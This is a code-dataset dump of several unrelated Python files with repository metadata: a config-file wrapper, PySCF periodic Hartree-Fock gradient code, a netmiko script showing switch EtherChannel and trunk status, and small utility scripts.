| 25.463415 | 78 | 0.447318 | 76 | 1,044 | 5.052632 | 0.671053 | 0.041667 | 0.067708 | 0.088542 | 0.130208 | 0.130208 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.428161 | 1,044 | 40 | 79 | 26.1 | 0.626466 | 0.686782 | 0 | 0 | 0 | 0 | 0.169065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b8f9982b50627682d54317043d5eeb11692e19 | 1,470 | py | Python | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | fp-lib/fp_lib/common/confparser.py | 2535463841/fluent-python | 6e72fb2b671068bcb419fb7a696f4488c1c9b918 | [
"Apache-2.0"
] | null | null | null | import collections
from six.moves import configparser
class ConfigParserWrapper(object):
def __init__(self):
self._parser = configparser.ConfigParser()
self._file = None
self._defaults = None
def defaults(self):
if self._defaults is None:
self._defaults = self._parser.defaults()
return self._defaults
def read(self, file):
self._file = file
if isinstance(file, str):
self._parser.read(file)
else:
self._parser.readfp(file)
def sections(self):
return self._parser.sections()
def options(self, section, ignore_default=False):
if section == 'DEFAULT':
return self._parser.defaults()
options = collections.OrderedDict()
for option in self._parser.options(section):
value = self._parser.get(section, option)
if ignore_default and value == self.defaults().get(option):
continue
options[option] = self._parser.get(section, option)
return options
def get(self, option, section='DEFAULT'):
options = self.options(section)
if option not in options:
raise configparser.NoOptionError(option, section)
return options.get(option)
def set(self, option, value, section='DEFAULT'):
self._parser.set(section, option, value)
with open(self._file, 'w') as fp:
self._parser.write(fp)
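# Minimal usage sketch (assumes an INI file 'app.conf' exists; not part of the
# original source). Note that set() rewrites the file read() was given, so
# pass a filename rather than a file object if you intend to call set():
#   parser = ConfigParserWrapper()
#   parser.read('app.conf')
#   timeout = parser.get('timeout')   # section defaults to 'DEFAULT'
#   parser.set('timeout', '30')       # updates the file on disk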
| 30.625 | 71 | 0.616327 | 163 | 1,470 | 5.411043 | 0.294479 | 0.124717 | 0.036281 | 0.045351 | 0.058957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.283673 | 1,470 | 47 | 72 | 31.276596 | 0.837607 | 0 | 0 | 0 | 0 | 0 | 0.014966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.184211 | false | 0 | 0.052632 | 0.026316 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b977d8a31e77d99b632de57227591e1592b23d | 17,115 | py | Python | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 501 | 2018-12-06T23:48:17.000Z | 2022-03-31T11:53:18.000Z | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 710 | 2018-11-26T22:04:52.000Z | 2022-03-30T03:53:12.000Z | pyscf/pbc/grad/krhf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 273 | 2018-11-26T10:10:24.000Z | 2022-03-30T12:25:28.000Z | #!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Yang Gao <younggao1994@gmail.com>
#
'''
Non-relativistic analytical nuclear gradients for restricted Hartree Fock with kpoints sampling
'''
import numpy as np
from pyscf import lib
from pyscf.lib import logger
from pyscf.grad import rhf as molgrad
from pyscf.pbc.gto.pseudo.pp import get_vlocG, get_alphas, get_projG, projG_li, _qli
from pyscf.pbc.dft.numint import eval_ao_kpts
from pyscf.pbc import gto, tools
from pyscf.gto import mole
import scipy
def grad_elec(mf_grad, mo_energy=None, mo_coeff=None, mo_occ=None, atmlst=None):
'''
Electronic part of KRHF/KRKS gradients
Args:
mf_grad : pbc.grad.krhf.Gradients or pbc.grad.krks.Gradients object
'''
mf = mf_grad.base
cell = mf_grad.cell
kpts = mf.kpts
nkpts = len(kpts)
if mo_energy is None: mo_energy = mf.mo_energy
if mo_occ is None: mo_occ = mf.mo_occ
if mo_coeff is None: mo_coeff = mf.mo_coeff
if atmlst is None: atmlst = range(cell.natm)
log = logger.Logger(mf_grad.stdout, mf_grad.verbose)
hcore_deriv = mf_grad.hcore_generator(cell, kpts)
s1 = mf_grad.get_ovlp(cell, kpts)
dm0 = mf.make_rdm1(mo_coeff, mo_occ)
t0 = (logger.process_clock(), logger.perf_counter())
log.debug('Computing Gradients of NR-HF Coulomb repulsion')
vhf = mf_grad.get_veff(dm0, kpts)
log.timer('gradients of 2e part', *t0)
dme0 = mf_grad.make_rdm1e(mo_energy, mo_coeff, mo_occ)
aoslices = cell.aoslice_by_atom()
de = np.zeros([len(atmlst),3])
for x, ia in enumerate(atmlst):
p0, p1 = aoslices[ia,2:]
h1ao = hcore_deriv(ia)
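# standard SCF gradient contractions (noted for orientation):
#   dE/dx = Tr[dh/dx D] + Tr[dVeff/dx D] - Tr[dS/dx W]
# with D the density matrix and W the energy-weighted density matrix; the
# factor 2 restores the ket-side derivative, since the integrals above only
# differentiate the bra.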
de[x] += np.einsum('xkij,kji->x', h1ao, dm0).real
# nabla was applied on bra in vhf, *2 for the contributions of nabla|ket>
de[x] += np.einsum('xkij,kji->x', vhf[:,:,p0:p1], dm0[:,:,p0:p1]).real * 2
de[x] -= np.einsum('kxij,kji->x', s1[:,:,p0:p1], dme0[:,:,p0:p1]).real * 2
de[x] /= nkpts
de[x] += mf_grad.extra_force(ia, locals())
if log.verbose > logger.DEBUG:
log.debug('gradients of electronic part')
mf_grad._write(log, cell, de, atmlst)
return de
def _make_fakemol():
fakemol = mole.Mole()
fakemol._atm = np.zeros((1,mole.ATM_SLOTS), dtype=np.int32)
fakemol._bas = np.zeros((1,mole.BAS_SLOTS), dtype=np.int32)
ptr = mole.PTR_ENV_START
fakemol._env = np.zeros(ptr+10)
fakemol._bas[0,mole.NPRIM_OF ] = 1
fakemol._bas[0,mole.NCTR_OF ] = 1
fakemol._bas[0,mole.PTR_EXP ] = ptr+3
fakemol._bas[0,mole.PTR_COEFF] = ptr+4
return fakemol
def get_hcore(cell, kpts):
'''Part of the nuclear gradients of core Hamiltonian'''
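# Outline (for orientation; not from the original source): the kinetic term
# comes from the analytic int1e_ipkin integrals; with GTH pseudopotentials,
# the local part is evaluated on the real-space FFT grid and the separable
# nonlocal part is assembled in reciprocal space for each k-point.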
h1 = np.asarray(cell.pbc_intor('int1e_ipkin', kpts=kpts))
dtype = h1.dtype
if cell._pseudo:
SI = cell.get_SI()
Gv = cell.Gv
natom = cell.natm
coords = cell.get_uniform_grids()
ngrids = len(coords)
vlocG = get_vlocG(cell)
vpplocG = -np.einsum('ij,ij->j', SI, vlocG)
vpplocG[0] = np.sum(get_alphas(cell))
vpplocR = tools.ifft(vpplocG, cell.mesh).real
fakemol = _make_fakemol()
ptr = mole.PTR_ENV_START
for kn, kpt in enumerate(kpts):
aos = eval_ao_kpts(cell, coords, kpt, deriv=1)[0]
vloc = np.einsum('agi,g,gj->aij', aos[1:].conj(), vpplocR, aos[0])
expir = np.exp(-1j*np.dot(coords, kpt))
aokG = np.asarray([tools.fftk(np.asarray(ao.T, order='C'),
cell.mesh, expir).T for ao in aos])
Gk = Gv + kpt
G_rad = lib.norm(Gk, axis=1)
vnl = np.zeros(vloc.shape, dtype=np.complex128)
for ia in range(natom):
symb = cell.atom_symbol(ia)
if symb not in cell._pseudo:
continue
pp = cell._pseudo[symb]
for l, proj in enumerate(pp[5:]):
rl, nl, hl = proj
if nl >0:
hl = np.asarray(hl)
fakemol._bas[0,mole.ANG_OF] = l
fakemol._env[ptr+3] = .5*rl**2
fakemol._env[ptr+4] = rl**(l+1.5)*np.pi**1.25
pYlm_part = fakemol.eval_gto('GTOval', Gk)
pYlm = np.empty((nl,l*2+1,ngrids))
for k in range(nl):
qkl = _qli(G_rad*rl, l, k)
pYlm[k] = pYlm_part.T * qkl
SPG_lmi = np.einsum('g,nmg->nmg', SI[ia].conj(), pYlm)
SPG_lm_aoG = np.einsum('nmg,agp->anmp', SPG_lmi, aokG)
tmp = np.einsum('ij,ajmp->aimp', hl, SPG_lm_aoG[1:])
vnl += np.einsum('aimp,imq->apq', tmp.conj(), SPG_lm_aoG[0])
vnl *= (1./ngrids**2)
if dtype == np.float64:
h1[kn,:] += vloc.real + vnl.real
else:
h1[kn,:] += vloc + vnl
else:
raise NotImplementedError
return h1
def get_ovlp(cell, kpts):
return -np.asarray(cell.pbc_intor('int1e_ipovlp', kpts=kpts))
def hcore_generator(mf, cell=None, kpts=None):
if cell is None: cell = mf.cell
if kpts is None: kpts = mf.kpts
h1 = get_hcore(cell, kpts)
dtype = h1.dtype
aoslices = cell.aoslice_by_atom()
SI = cell.get_SI()  # [natom, grid]
mesh = cell.mesh
Gv = cell.Gv  # [grid, 3]
ngrids = len(Gv)
coords = cell.get_uniform_grids()
vlocG = get_vlocG(cell)  # [natom, grid]
ptr = mole.PTR_ENV_START
def hcore_deriv(atm_id):
shl0, shl1, p0, p1 = aoslices[atm_id]
symb = cell.atom_symbol(atm_id)
fakemol = _make_fakemol()
vloc_g = 1j * np.einsum('ga,g->ag', Gv, SI[atm_id]*vlocG[atm_id])
nkpts, nao = h1.shape[0], h1.shape[2]
hcore = np.zeros([3,nkpts,nao,nao], dtype=h1.dtype)
for kn, kpt in enumerate(kpts):
ao = eval_ao_kpts(cell, coords, kpt)[0]
rho = np.einsum('gi,gj->gij',ao.conj(),ao)
for ax in range(3):
vloc_R = tools.ifft(vloc_g[ax], mesh).real
vloc = np.einsum('gij,g->ij', rho, vloc_R)
hcore[ax,kn] += vloc
rho = None
aokG= tools.fftk(np.asarray(ao.T, order='C'),
mesh, np.exp(-1j*np.dot(coords, kpt))).T
ao = None
Gk = Gv + kpt
G_rad = lib.norm(Gk, axis=1)
if symb not in cell._pseudo: continue
pp = cell._pseudo[symb]
for l, proj in enumerate(pp[5:]):
rl, nl, hl = proj
if nl >0:
hl = np.asarray(hl)
fakemol._bas[0,mole.ANG_OF] = l
fakemol._env[ptr+3] = .5*rl**2
fakemol._env[ptr+4] = rl**(l+1.5)*np.pi**1.25
pYlm_part = fakemol.eval_gto('GTOval', Gk)
pYlm = np.empty((nl,l*2+1,ngrids))
for k in range(nl):
qkl = _qli(G_rad*rl, l, k)
pYlm[k] = pYlm_part.T * qkl
SPG_lmi = np.einsum('g,nmg->nmg', SI[atm_id].conj(), pYlm)
SPG_lm_aoG = np.einsum('nmg,gp->nmp', SPG_lmi, aokG)
SPG_lmi_G = 1j * np.einsum('nmg, ga->anmg', SPG_lmi, Gv)
SPG_lm_G_aoG = np.einsum('anmg, gp->anmp', SPG_lmi_G, aokG)
tmp_1 = np.einsum('ij,ajmp->aimp', hl, SPG_lm_G_aoG)
tmp_2 = np.einsum('ij,jmp->imp', hl, SPG_lm_aoG)
vppnl = (np.einsum('imp,aimq->apq', SPG_lm_aoG.conj(), tmp_1) +
np.einsum('aimp,imq->apq', SPG_lm_G_aoG.conj(), tmp_2))
vppnl *= (1./ngrids**2)
if dtype==np.float64:
hcore[:,kn] += vppnl.real
else:
hcore[:,kn] += vppnl
hcore[:,kn,p0:p1] -= h1[kn,:,p0:p1]
hcore[:,kn,:,p0:p1] -= h1[kn,:,p0:p1].transpose(0,2,1).conj()
return hcore
return hcore_deriv
def grad_nuc(cell, atmlst):
'''
Derivatives of nuclear repulsion energy wrt nuclear coordinates
'''
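# Ewald split, noted for orientation (not from the original source): the
# real-space loop below differentiates q_i*q_j*erfc(eta*r)/r, giving
#   -q_i*q_j*(erfc(eta*r)/r**3 + 2*eta*exp(-(eta*r)**2)/(sqrt(pi)*r**2))*r_vec
# per lattice image, while the reciprocal-space loop weights
# Im(ZS(G)*conj(S_i(G))) by G*coulG*exp(-|G|**2/(4*eta**2)).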
ew_eta = cell.get_ewald_params()[0]
chargs = cell.atom_charges()
coords = cell.atom_coords()
Lall = cell.get_lattice_Ls()
natom = len(chargs)
ewovrl_grad = np.zeros([natom,3])
for i, qi in enumerate(chargs):
ri = coords[i]
for j in range(natom):
if j == i:
continue
qj = chargs[j]
rj = coords[j]
r1 = ri-rj + Lall
r = np.sqrt(np.einsum('ji,ji->j', r1, r1))
r = r.reshape(len(r),1)
ewovrl_grad[i] += np.sum(- (qi * qj / r ** 3 * r1 *
scipy.special.erfc(ew_eta * r).reshape(len(r),1)), axis = 0)
ewovrl_grad[i] += np.sum(- qi * qj / r ** 2 * r1 * 2 * ew_eta / np.sqrt(np.pi) *
np.exp(-ew_eta**2 * r ** 2).reshape(len(r),1), axis = 0)
mesh = gto.cell._cut_mesh_for_ewald(cell, cell.mesh)
Gv, Gvbase, weights = cell.get_Gv_weights(mesh)
absG2 = np.einsum('gi,gi->g', Gv, Gv)
absG2[absG2==0] = 1e200
ewg_grad = np.zeros([natom,3])
SI = cell.get_SI(Gv)
if cell.low_dim_ft_type is None or cell.dimension == 3:
coulG = 4*np.pi / absG2
coulG *= weights
ZSI = np.einsum("i,ij->j", chargs, SI)
ZexpG2 = coulG * np.exp(-absG2/(4*ew_eta**2))
ZexpG2_mod = ZexpG2.reshape(len(ZexpG2),1) * Gv
for i, qi in enumerate(chargs):
Zfac = np.imag(ZSI * SI[i].conj()) * qi
ewg_grad[i] = - np.sum(Zfac.reshape((len(Zfac),1)) * ZexpG2_mod, axis = 0)
ew_grad = ewg_grad + ewovrl_grad
if atmlst is not None:
ew_grad = ew_grad[atmlst]
return ew_grad
def get_jk(mf_grad, dm, kpts):
'''J = ((-nabla i) j| kl) D_lk
K = ((-nabla i) j| kl) D_jk
'''
vj, vk = mf_grad.get_jk(dm, kpts)
return vj, vk
def get_j(mf_grad, dm, kpts):
return mf_grad.get_j(dm, kpts)
def get_k(mf_grad, dm, kpts):
return mf_grad.get_k(dm, kpts)
def get_veff(mf_grad, dm, kpts):
'''NR Hartree-Fock Coulomb repulsion'''
vj, vk = mf_grad.get_jk(dm, kpts)
return vj - vk * .5
def make_rdm1e(mo_energy, mo_coeff, mo_occ):
'''Energy weighted density matrix'''
nkpts = len(mo_occ)
dm1e = [molgrad.make_rdm1e(mo_energy[k], mo_coeff[k], mo_occ[k]) for k in range(nkpts)]
return np.asarray(dm1e)
class GradientsMixin(molgrad.GradientsMixin):
'''
Basic nuclear gradient functions for non-relativistic methods
'''
def __init__(self, method):
self.cell = method.cell
self.kpts = method.kpts
molgrad.GradientsMixin.__init__(self, method)
def get_hcore(self, cell=None, kpts=None):
if cell is None: cell = self.cell
if kpts is None: kpts = self.kpts
return get_hcore(cell, kpts)
hcore_generator = hcore_generator
def get_ovlp(self, cell=None, kpts=None):
if cell is None: cell = self.cell
if kpts is None: kpts = self.kpts
return get_ovlp(cell, kpts)
def get_jk(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
exxdiv = self.base.exxdiv
cpu0 = (logger.process_clock(), logger.perf_counter())
vj, vk = self.base.with_df.get_jk_e1(dm, kpts, exxdiv=exxdiv)
logger.timer(self, 'vj and vk', *cpu0)
return vj, vk
def get_j(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
cpu0 = (logger.process_clock(), logger.perf_counter())
vj = self.base.with_df.get_j_e1(dm, kpts)
logger.timer(self, 'vj', *cpu0)
return vj
def get_k(self, dm=None, kpts=None, kpts_band=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
exxdiv = self.base.exxdiv
cpu0 = (logger.process_clock(), logger.perf_counter())
vk = self.base.with_df.get_k_e1(dm, kpts, kpts_band, exxdiv)
logger.timer(self, 'vk', *cpu0)
return vk
def grad_nuc(self, cell=None, atmlst=None):
if cell is None: cell = self.cell
return grad_nuc(cell, atmlst)
def as_scanner(mf_grad):
'''Generating a nuclear gradients scanner/solver (for geometry optimizer).
The returned solver is a function. This function requires one argument
"cell" as input and returns energy and first order nuclear derivatives.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
nuc-grad object and SCF object (DIIS, conv_tol, max_memory etc) are
automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
'''
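# Usage sketch (mirrors the __main__ block at the bottom of this file; 'cell'
# is any pbc.gto.Cell):
#   g_scan = Gradients(kmf).as_scanner()
#   e_tot, de = g_scan(cell)   # total energy and nuclear gradients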
if isinstance(mf_grad, lib.GradScanner):
return mf_grad
logger.info(mf_grad, 'Create scanner for %s', mf_grad.__class__)
class SCF_GradScanner(mf_grad.__class__, lib.GradScanner):
def __init__(self, g):
lib.GradScanner.__init__(self, g)
def __call__(self, cell_or_geom, **kwargs):
if isinstance(cell_or_geom, gto.Cell):
cell = cell_or_geom
else:
cell = self.cell.set_geom_(cell_or_geom, inplace=False)
mf_scanner = self.base
e_tot = mf_scanner(cell)
self.cell = cell
# If second integration grids are created for RKS and UKS
# gradients
if getattr(self, 'grids', None):
self.grids.reset(cell)
de = self.kernel(**kwargs)
return e_tot, de
return SCF_GradScanner(mf_grad)
class Gradients(GradientsMixin):
'''Non-relativistic restricted Hartree-Fock gradients'''
def get_veff(self, dm=None, kpts=None):
if kpts is None: kpts = self.kpts
if dm is None: dm = self.base.make_rdm1()
return get_veff(self, dm, kpts)
def make_rdm1e(self, mo_energy=None, mo_coeff=None, mo_occ=None):
if mo_energy is None: mo_energy = self.base.mo_energy
if mo_coeff is None: mo_coeff = self.base.mo_coeff
if mo_occ is None: mo_occ = self.base.mo_occ
return make_rdm1e(mo_energy, mo_coeff, mo_occ)
def extra_force(self, atom_id, envs):
'''Hook for extra contributions in analytical gradients.
Contributions like the response of auxiliary basis in density fitting
method, the grid response in DFT numerical integration can be put in
this function.
'''
#1 force from exxdiv corrections when madelung constant has non-zero derivative
#2 DFT grid response
return 0
grad_elec = grad_elec
as_scanner = as_scanner
def _finalize(self):
if self.verbose >= logger.NOTE:
logger.note(self, '--------------- %s gradients ---------------',
self.base.__class__.__name__)
self._write(self.cell, self.de, self.atmlst)
logger.note(self, '----------------------------------------------')
def kernel(self, mo_energy=None, mo_coeff=None, mo_occ=None, atmlst=None):
cput0 = (logger.process_clock(), logger.perf_counter())
if mo_energy is None: mo_energy = self.base.mo_energy
if mo_coeff is None: mo_coeff = self.base.mo_coeff
if mo_occ is None: mo_occ = self.base.mo_occ
if atmlst is None:
atmlst = self.atmlst
else:
self.atmlst = atmlst
if self.verbose >= logger.INFO:
self.dump_flags()
de = self.grad_elec(mo_energy, mo_coeff, mo_occ, atmlst)
self.de = de + self.grad_nuc(atmlst=atmlst)
logger.timer(self, 'SCF gradients', *cput0)
self._finalize()
return self.de
if __name__=='__main__':
from pyscf.pbc import scf
cell = gto.Cell()
cell.atom = '''
He 0.0 0.0 0.0
He 1.0 1.1 1.2
'''
cell.basis = 'gth-dzv'
cell.a = np.eye(3) * 3
cell.unit='bohr'
cell.pseudo='gth-pade'
cell.verbose=4
cell.build()
nmp = [1,1,3]
kpts = cell.make_kpts(nmp)
kmf = scf.KRHF(cell, kpts, exxdiv=None)
kmf.kernel()
mygrad = Gradients(kmf)
grad = mygrad.kernel()
| 38.11804 | 100 | 0.577914 | 2,515 | 17,115 | 3.778926 | 0.185686 | 0.017045 | 0.007576 | 0.008838 | 0.327652 | 0.281776 | 0.233796 | 0.213594 | 0.166246 | 0.162879 | 0 | 0.01959 | 0.293135 | 17,115 | 448 | 101 | 38.203125 | 0.765994 | 0.132866 | 0 | 0.258824 | 0 | 0 | 0.040579 | 0.003143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079412 | false | 0 | 0.029412 | 0.008824 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8baab9f5c40481a95b8ff51403fe91d0a5257af | 980 | py | Python | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | 2 | 2017-09-11T14:28:15.000Z | 2018-01-07T17:36:32.000Z | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | null | null | null | show.py | OthmaneBlial/EtherChannel-using-Netmiko | 3a51a5148681178b441cc3587ad16419c330ec06 | [
"MIT"
] | null | null | null | from netmiko import ConnectHandler
import data
def message(msg):
print('\n\n'+80*'#')
print('\n\n' + 20*'#' +' '+ msg + ' '+ 20*'#' + '\n\n')
print(80*'#'+'\n\n')
def show_etherchannel_summary(SWITCHES):
idx = 0
for SWITCH in SWITCHES:
idx += 1
print(20*'*'+' Showing Etherchannel summary for SWITCH '+ str(idx) + ' ' + 20*'*')
net_connect = ConnectHandler(**SWITCH)
output = net_connect.send_command('sho etherchannel summary | begin Group')
print(output)
def show_int_trunk(SWITCHES):
idx = 0
for SWITCH in SWITCHES:
idx += 1
print(20*'*'+' Showing trunking interfaces for SWITCH '+ str(idx) + ' ' + 20*'*')
net_connect = ConnectHandler(**SWITCH)
output = net_connect.send_command('show int trunk')
print(output)
SWITCHES = [data.SW1, data.SW2, data.SW3, data.SW4]
message('Showing Etherchannel summary')
show_etherchannel_summary(SWITCHES)
message('Showing trunking interfaces')
show_int_trunk(SWITCHES) | 27.222222 | 85 | 0.657143 | 126 | 980 | 5 | 0.31746 | 0.150794 | 0.057143 | 0.098413 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0.390476 | 0 | 0.03 | 0.183673 | 980 | 36 | 86 | 27.222222 | 0.7575 | 0 | 0 | 0.37037 | 0 | 0 | 0.231501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.074074 | 0 | 0.185185 | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c137fe879760785cd044287714b203b8302dae | 651 | py | Python | scripts/update_encoder.py | tiberiu44/TTS-Cube | e841c726268c2c4b01c5fb1306fb1f032ec02994 | [
"Apache-2.0"
] | 216 | 2018-07-23T07:55:49.000Z | 2022-01-08T19:15:02.000Z | scripts/update_encoder.py | CherokeeLanguage/TTS-Cube | 9bfd01067ee0ba68820dff9ff5c25c530477d2cd | [
"Apache-2.0"
] | 30 | 2018-08-02T11:04:41.000Z | 2022-03-11T23:31:31.000Z | scripts/update_encoder.py | CherokeeLanguage/TTS-Cube | 9bfd01067ee0ba68820dff9ff5c25c530477d2cd | [
"Apache-2.0"
] | 47 | 2018-07-22T06:02:19.000Z | 2021-01-19T12:46:08.000Z | f_in = open("data/models/rnn_encoder.network-backup", "r")
f_out = open("data/models/rnn_encoder.network", "w")
add_params = False
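# Widens lookup parameter /_2 from {200,19} to {200,20}, i.e. from 19 to 20
# embeddings of dimension 200: after the matching header line, the very next
# line holds the flattened weights, and its last 200 floats (one embedding
# vector) are appended again to initialise the new 20th entry.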
for line in f_in.readlines():
if not add_params:
if line == '#LookupParameter# /_2 {200,19} 60801 ZERO_GRAD\n':
line = '#LookupParameter# /_2 {200,20} 60801 ZERO_GRAD\n'
add_params = True
print("Found")
f_out.write(line)
else:
line = line[:-1]
f_out.write(line)
parts = line.split(' ')
for part in parts[-200:]:
f_out.write(' ' + part)
f_out.write('\n')
add_params = False
f_out.close()
f_in.close()
| 31 | 70 | 0.571429 | 93 | 651 | 3.795699 | 0.419355 | 0.067989 | 0.101983 | 0.096317 | 0.175637 | 0.175637 | 0 | 0 | 0 | 0 | 0 | 0.055319 | 0.278034 | 651 | 20 | 71 | 32.55 | 0.695745 | 0 | 0 | 0.2 | 0 | 0 | 0.270353 | 0.105991 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c3fb5a21bccf2394bb7aa867a5ba1f5a5864e9 | 502 | py | Python | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | hello/sys_do.py | Supremeyh/python | 062374bc7dc4bbb3f9b331d8c2ea0fb2d16d6d4c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module '
__author__ = 'sea' # 特殊变量
import sys
def test():
args = sys.argv
if len(args)==1:
print('hello, python')
elif len(args)==2:
print('hello, %s' % args[1]) # args[0]为第一个参数永远是该.py文件的名称
else:
print('too many arguments')
if __name__ == '__main__':
test()
# 当我们在命令行运行本sys模块文件时,Python解释器把一个特殊变量__name__置为__main__,
# 而如果在其他地方导入该sys模块时, if判断将失败.
# 因此,这种if测试可以让一个模块通过命令行运行时执行一些额外的代码,最常见的就是运行测试。 | 20.916667 | 64 | 0.641434 | 59 | 502 | 5.118644 | 0.745763 | 0.046358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015113 | 0.209163 | 502 | 24 | 65 | 20.916667 | 0.745592 | 0.434263 | 0 | 0 | 0 | 0 | 0.225256 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.153846 | 0.230769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c4b1f572f798f5bd93a8dac95f6dad0edd366a | 386 | py | Python | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | src/download_raw.py | aeturrell/example-reproducible-research | 4de882d1af05ade52e3991c1c4e1f939c9714f8f | [
"MIT"
] | null | null | null | """
This script stands in for the data-download step of the pipeline. In a full
analysis it would download the series listed in the yaml config file from
the ONS API; here it loads a seaborn demo dataset as a stand-in.
"""
from pathlib import Path
import seaborn as sns
def get_and_save_raw_data():
""" Saves the raw data to disk.
"""
df = sns.load_dataset("car_crashes")
df.to_csv(Path("raw/raw_data.csv"))
if __name__ == "__main__":
get_and_save_raw_data()
| 21.444444 | 63 | 0.702073 | 64 | 386 | 3.921875 | 0.671875 | 0.111554 | 0.079681 | 0.103586 | 0.135458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194301 | 386 | 17 | 64 | 22.705882 | 0.807074 | 0.388601 | 0 | 0 | 0 | 0 | 0.157658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c62df79850b9d4f8ad9635bcf8b64ccb6d7ece | 780 | py | Python | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
] | 2 | 2021-10-30T23:23:38.000Z | 2021-10-31T14:30:59.000Z | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
